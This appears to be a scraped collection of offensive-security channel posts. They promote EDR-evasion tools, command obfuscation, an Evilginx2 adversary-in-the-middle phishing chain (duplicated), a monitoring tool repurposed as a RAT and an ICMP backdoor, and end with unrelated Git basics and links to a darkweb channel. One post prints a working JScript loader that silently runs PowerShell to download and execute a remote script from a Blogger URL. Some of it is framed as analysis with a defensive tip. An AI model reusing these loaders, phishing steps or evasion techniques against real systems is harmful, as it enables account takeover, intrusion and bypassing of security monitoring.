All Security Engineering Courses

EDRStartupHinder Prevents AV / EDR from running by redirecting a core DLL in the System32 folder to another location during Windows startup. Blog: https://www.zerosalarium.com/2026/01/edrstartuphinder-edr-startup-process-blocker.html

Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154) CVE-2025-50154 allows an attacker to extract NTLM hashes without any user interaction, even on fully patched systems. By exploiting a subtle gap left in the mitigation, an attacker can trigger NTLM authentication requests automatically, enabling offline cracking or relay attacks to gain unauthorized access.

Obfusk8 now integrates a state-of-the-art Indirect Syscall mechanism to bypass User-Mode Hooks (EDRs/AVs) and static analysis checks. => "The Sorting Hat" Resolution: Instead of reading the .text section of ntdll.dll (which is often hooked or monitored), the engine parses the Export Directory. It filters functions starting with Zw, sorts them by memory address, and deduces the System Call Number (SSN) based on their index. This allows SSN resolution without ever touching executable code. => Lateral Gadget Execution: The engine does not contain the syscall (0F 05) instruction in its own binary. Instead, it locates a valid syscall; ret gadget inside ntdll.dll memory at runtime. Clean Call Stacks: A custom thunk is allocated that jumps to the ntdll gadget. To the OS kernel and security sensors, the system call appears to originate legitimately from ntdll.dll, maintaining a clean call stack. => Usage: Simply use K8_SYSCALL("ZwOpenProcess", ...) instead of NtOpenProcess. You have built a system that : 1 - Does not scan .text (Sorting Hat logic on Exports). 2 - Does not execute syscall locally (Lateral Gadget execution). 3 - Does not leave traces (Clean Call Stacks).

⚙️ ArgFuscator Приложение с открытым исходным кодом, которое помогает генерировать обфусцированные команды для 💻 Windows, 🐧 Linux и 💻 MacOS 🔗 ArgFuscator Invoke-ArgFuscator:

Install-Module -Name Invoke-ArgFuscator
Import-Module Invoke-ArgFuscator

Invoke-ArgFuscator -Command 'certutil /f /urlcache https://www.example.org/ homepage.txt'

Invoke-ArgFuscator -InputFile path\to\file.json

😹 Offline version #windows #obfuscator #redteam ✈️ Join Us For More.... ‎ ‎🔥Telegram🔥: ‎https://t.me/SuBoXoneSoCiety ‎ ‎☠️Darkweb room☠️: http://suboxone2fzkkkeuezwozbbajgqargceo62wdx3f53awty6dv4mzzbad.onion ‎ ‎🫂Whatsapp community🫂 :https://whatsapp.com/channel/0029Vb7WAkz4tRrkdnGzzy25

⏰🤖Real-Time Phishing Agents (Dynamic Phishing) ❓ why we use Real-time Phishing Agents (Dynamic Phishing) : When we relay on static templates the site will update continuously this will make the work more harder to Update the Phishing template every day, also if the user enabled MFA the full operation will fall down.. Because MFA code is temporary and we have 0 interaction with the Real Site to verify the token we got... That`s why the Dynamic Phishing Solve this matter. ℹ️ what is shown in the image above is example of Phishing operation in real time, where the attacker don`t relay on static template, instead its clone the server page in real-time , that`s will help the attacker to don`t relay on static templates and update it every day to mimic the real site. 😈 Adversary-in-the-Middle (AiTM): is a targeted, real-time phishing technique where the attacker operates a proxy between the victim and the legitimate service to intercept and manipulate the live authentication flow — capturing credentials, session cookies, tokens, or one-time codes so the attacker can immediately take over the session (often bypassing MFA). 🥷 attacker will capture credentials in real-time & often bypass MFA and that is the biggest advantage of Dynamic Phishing. 💻 Explain the attack Chain Using Evliginx2: 1. The Lure (Step 1) 🕷🔗: The victim clicks a phishing link (e.g., sent via email) that points to the attacker's domain: https://login.fakemicrosoft.com . The victim's browser sends a request to the Evilginx2 server, thinking it is the login page. 2. The Proxy Request (Step 2) 📶: Instead of serving a fake static page, the Evilginx2 server silently forwards that request to the real Microsoft login URL (https://login.microsoftonline.com). 3. Fetching the Real Site (Step 3) ™️🌐 : Microsoft's server receives the request. Thinking it's a normal user, it responds by sending the code for the actual login page back to the Evilginx2 server. 4. Displaying the Trap (Step 4) 🔼🔽: Evilginx2 takes that real login page and serves it to the victim. Crucial Detail: The victim sees the exact real login page because it is the real code, just served from the wrong domain (fakemicrosoft.com). 5. The Interception (Step 5) 💻 : The victim enters their username and password. These credentials are sent to the Evilginx2 server first, not Microsoft. The attacker now captures the password. 6. The Relay (Step 6)👊 : Evilginx2 immediately uses those stolen credentials to log in to the real Microsoft server on the backend. Note: If MFA (2FA) were required, Evilginx would prompt the user for the code here, capture it, and relay that too (this is the "Real-Time" aspect). 7. The Theft (Step 7 - The "Gold") ✅™️ : Microsoft accepts the valid credentials and replies with a Session Cookie (the digital token that proves you are logged in). Evilginx2 captures and saves this cookie. This is the main goal. With this cookie, the attacker can open their own browser, inject the cookie, and access the victim's account without needing the password or MFA again. 8. The Clean Exit (Step 8) 💻🏃‍♂️ : To avoid raising suspicion, Evilginx2 finally redirects the victim to a totally different website (or the actual Microsoft dashboard). The victim thinks they just logged in normally, or perhaps that the page glitched, while the attacker now has full access to the account.

⏰🤖Real-Time Phishing Agents (Dynamic Phishing) ❓ why we use Real-time Phishing Agents (Dynamic Phishing) : When we relay on static templates the site will update continuously this will make the work more harder to Update the Phishing template every day, also if the user enabled MFA the full operation will fall down.. Because MFA code is temporary and we have 0 interaction with the Real Site to verify the token we got... That`s why the Dynamic Phishing Solve this matter. ℹ️ what is shown in the image above is example of Phishing operation in real time, where the attacker don`t relay on static template, instead its clone the server page in real-time , that`s will help the attacker to don`t relay on static templates and update it every day to mimic the real site. 😈 Adversary-in-the-Middle (AiTM): is a targeted, real-time phishing technique where the attacker operates a proxy between the victim and the legitimate service to intercept and manipulate the live authentication flow — capturing credentials, session cookies, tokens, or one-time codes so the attacker can immediately take over the session (often bypassing MFA). 🥷 attacker will capture credentials in real-time & often bypass MFA and that is the biggest advantage of Dynamic Phishing. 💻 Explain the attack Chain Using Evliginx2: 1. The Lure (Step 1) 🕷🔗: The victim clicks a phishing link (e.g., sent via email) that points to the attacker's domain: https://login.fakemicrosoft.com . The victim's browser sends a request to the Evilginx2 server, thinking it is the login page. 2. The Proxy Request (Step 2) 📶: Instead of serving a fake static page, the Evilginx2 server silently forwards that request to the real Microsoft login URL (https://login.microsoftonline.com). 3. Fetching the Real Site (Step 3) ™️🌐 : Microsoft's server receives the request. Thinking it's a normal user, it responds by sending the code for the actual login page back to the Evilginx2 server. 4. Displaying the Trap (Step 4) 🔼🔽: Evilginx2 takes that real login page and serves it to the victim. Crucial Detail: The victim sees the exact real login page because it is the real code, just served from the wrong domain (fakemicrosoft.com). 5. The Interception (Step 5) 💻 : The victim enters their username and password. These credentials are sent to the Evilginx2 server first, not Microsoft. The attacker now captures the password. 6. The Relay (Step 6)👊 : Evilginx2 immediately uses those stolen credentials to log in to the real Microsoft server on the backend. Note: If MFA (2FA) were required, Evilginx would prompt the user for the code here, capture it, and relay that too (this is the "Real-Time" aspect). 7. The Theft (Step 7 - The "Gold") ✅™️ : Microsoft accepts the valid credentials and replies with a Session Cookie (the digital token that proves you are logged in). Evilginx2 captures and saves this cookie. This is the main goal. With this cookie, the attacker can open their own browser, inject the cookie, and access the victim's account without needing the password or MFA again. 8. The Clean Exit (Step 8) 💻🏃‍♂️ : To avoid raising suspicion, Evilginx2 finally redirects the victim to a totally different website (or the actual Microsoft dashboard). The victim thinks they just logged in normally, or perhaps that the page glitched, while the attacker now has full access to the account.

Nezha A legitimate open-source monitoring tool (post-exploitation RAT). Compatible with mainstream systems, including Linux, Windows, macOS, OpenWRT, and Synology. The agent provides SYSTEM/root level access, file management, and an interactive web terminal. VirusTotal shows 0/72 detections because it isn’t malware, it’s legitimate software pointed at attacker infrastructure. Installation is silent. Detection only occurs when attackers execute commands through the agent. Wiki: https://nezha.wiki/en_US/ Research: https://www.ontinue.com/resource/nezha-the-monitoring-tool-thats-also-a-perfect-rat/

TokenFlare Serverless AITM Simulation Framework for Entra ID and M365 Blog: https://labs.jumpsec.com/tokenflare-serverless-AiTM-phishing-in-under-60-seconds/

2026

ESC17: Using ADCS to Attack HTTPS-Enabled WSUS Clients How to leverage misconfigured ADCS templates to gain code execution on HTTPS-enabled WSUS clients.

icmpdoor - если вы проникаете в сеть, вы вероятно задумываетесь о создании бэкдора, чтобы легче контролировать сеть! Но большинство используют протокол TCP/UDP для создания обратной оболочки, что приводит к обнаружению этого устройства системами IPS/IDS, а также к отслеживанию и отключению от сети командами SOC! Для этого подходит протокол ICMP! Система ничего не подозревает и не проверяет связанные с ним журналы! И он даже обходит некоторые брандмауэры! 📱 Подписаться на Boosty 📱 📱 Вступить в закрытый канал на Boosty - Security [private] 📱 👉 Подписаться 👈 #backdoor #network

🛡 Malware Breakdown: Classic JScript via Shell.Application + Remote PowerShell Loader 🛡 This is an old-school but still effective against unpatched or unaware users. Perfect example of how attackers chain legacy techniques for initial access.

ghi = new ActiveXObject('Shell.Application');
ghi['ShellExecute']("powershell", '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (IRM https://decjan2026.blogspot.com/////////nipoli.pdf); Start-Sleep -Seconds 17', "", "open", 0);

🔎 Step-by-Step What It Does: 1️⃣Creates Shell.Application COM Object: ▶️new ActiveXObject('Shell.Application') → Instantiates the Windows Shell COM object (progid: Shell.Application). ▶️This is a legitimate object for file operations, but abused here for silent process creation. 2️⃣Obfuscated ShellExecute Call: ▶️Uses bracket notation ['ShellExecute'] instead of dot (minor obfuscation to evade simple string scans). ▶️Launches PowerShell with: ▶️-ep Bypass: Sets ExecutionPolicy to Bypass (ignores script signing restrictions). ▶️-c: Command mode. 3️⃣Inside the PowerShell Command: ▶️Forces TLS 1.2 for downloads: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ▶️Ensures compatibility with modern HTTPS sites (bypasses older protocol blocks). ▶️ Downloads & Executes Remote Script: ▶️Invoke-Expression (Invoke-RestMethod https://decjan2026.blogspot.com/////////nipoli.pdf) ▶️ Alias: IEX (IRM ...) ▶️ Fetches content from that Blogger URL (masquerading as a ".pdf" to look innocent) and executes it directly in memory. ▶️ Extra slashes (/////////) are ignored by HTTP — classic URL padding to evade filters. ▶️Start-Sleep -Seconds 17: Delays 17 seconds (likely to evade timed sandbox detection or give payload time to run). 4️⃣ Execution Flags: ▶️Window style 0: Runs PowerShell completely hidden (no visible window). ▶️Verb "open": Standard launch. 🧠 Why This Is Sneaky (2025 Context): ▶️Fileless & Silent: No disk writes initially — downloads straight to memory via IRM + IEX. ▶️Legacy Abuse: ActiveXObject + ShellExecute is ancient (IE-era JScript/WScript), but still works in hta/js/vbs dropped via phishing. ▶️PDF Lure: Filename "nipoli.pdf" tricks users/filters into thinking it's a harmless document. 💡 Pro Tip: This works because many orgs still allow WSH/JScript execution. Disable Windows Script Host via GPO if possible, or use AppLocker/Script Block Logging.

✅ Git Basics You Should Know 🛠📁 Git is a version control system used to track changes in your code, collaborate with others, and manage project history efficiently. 1️⃣ What is Git? Git lets you save snapshots of your code, go back to previous versions, and collaborate with teams without overwriting each other’s work. 📸 2️⃣ Install & Setup Git git --version # Check if Git is installed git config --global user.name "Your Name" git config --global user.email "you@example.com" 3️⃣ Initialize a Repository git init # Start a new local Git repo 🚀 4️⃣ Basic Workflow git add . # Stage all changes ➕ git commit -m "Message" # Save a snapshot 💾 git push # Push to remote (like GitHub) ☁️ 5️⃣ Check Status & History git status # See current changes 🚦 git log # View commit history 📜 6️⃣ Clone a Repo git clone https://github.com/username/repo.git 👯 7️⃣ Branching git branch feature-x # Create a branch 🌳 git checkout feature-x # Switch to it ↔️ git merge feature-x # Merge with main branch 🤝 8️⃣ Undo Mistakes ↩️ git checkout -- file.txt # Discard changes git reset HEAD~1 # Undo last commit (local) git revert <commit_id> # Revert commit (safe) 9️⃣ Working with GitHub – Create repo on GitHub ✨ – Link local repo: git remote add origin <repo_url> git push -u origin main 🔟 Git Best Practices – Commit often with clear messages ✅ – Use branches for features/bugs 💡 – Pull before push 🔄 – Never commit sensitive data 🔒 💡 Tip: Use GitHub Desktop or VS Code Git UI if CLI feels hard at first. Join Us For More.... 🔥Telegram🔥: https://t.me/SuBoXoneSoCiety ☠️Darkweb room☠️: http://suboxone2fzkkkeuezwozbbajgqargceo62wdx3f53awty6dv4mzzbad.onion 🫂Whatsapp community🫂 :https://whatsapp.com/channel/0029VaGX1X47T8bP63aZhb22